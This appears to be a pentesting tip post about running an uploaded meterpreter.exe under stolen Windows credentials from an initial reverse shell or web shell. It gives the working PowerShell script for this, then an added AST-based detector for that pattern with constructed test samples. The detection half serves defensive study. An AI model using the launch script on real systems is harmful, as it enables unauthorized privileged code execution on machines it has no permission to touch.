Using stored creds to get a privileged shell on Windows (PowerShell version)

Scenario: the pentester has initial access to a web app or system (for example, an initial reverse shell through the web app) and has found credentials that can be used to run commands. They are also able to create an admin account on the machine, but all ports are locked down except the web ports.

The following script can help execute an uploaded binary under different credentials when the pentester has an initial shell, or even just a web shell.

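# Credentials found during the engagement
$username = 'username'
$password = 'password'

# Start-Process needs a PSCredential, which wraps the password as a SecureString
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
# Launch the uploaded binary in the security context of that account
Start-Process C:/Temp/meterpreter.exe -Credential $credential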
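
From the defender's side, this pattern is visible in the script text itself. The following added example (not part of the original post) uses PowerShell's built-in AST parser to flag scripts that both convert a plaintext password with ConvertTo-SecureString -AsPlainText and pass -Credential to Start-Process. The function name and sample scripts are constructed; feeding it text from script block logging (event ID 4104) assumes that logging is enabled.

```powershell
# Added example: function name and sample scripts are constructed for illustration.
function Test-PlaintextCredentialLaunch {
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput(
        $ScriptText, [ref]$tokens, [ref]$errors)

    # Every command invocation in the script, including nested script blocks.
    $commands = $ast.FindAll(
        { param($n) $n -is [System.Management.Automation.Language.CommandAst] }, $true)

    $plaintext = $false; $launch = $false
    foreach ($cmd in $commands) {
        $name = $cmd.GetCommandName()      # $null for dynamic invocations such as & $x
        if (-not $name) { continue }
        $params = @($cmd.CommandElements |
            Where-Object { $_ -is [System.Management.Automation.Language.CommandParameterAst] } |
            ForEach-Object { $_.ParameterName })

        # PowerShell accepts unambiguous parameter prefixes (-AsP, -Cred), so match by prefix.
        if ($name -eq 'ConvertTo-SecureString' -and
            ($params | Where-Object { 'AsPlainText'.StartsWith($_, 'OrdinalIgnoreCase') })) {
            $plaintext = $true
        }
        if ($name -in ('Start-Process', 'saps', 'start') -and
            ($params | Where-Object { 'Credential'.StartsWith($_, 'OrdinalIgnoreCase') })) {
            $launch = $true
        }
    }
    [pscustomobject]@{
        PlaintextSecureString = $plaintext
        CredentialedLaunch    = $launch
        Suspicious            = $plaintext -and $launch
    }
}

# Constructed samples: one matching the pattern above, one benign.
$flagged = @'
$pw = ConvertTo-SecureString 'example' -AsPlainText -Force
$c  = New-Object System.Management.Automation.PSCredential 'svc', $pw
Start-Process C:/Temp/tool.exe -Cred $c
'@
$benign = 'Start-Process notepad.exe -Wait'
foreach ($s in $flagged, $benign) { Test-PlaintextCredentialLaunch -ScriptText $s }
```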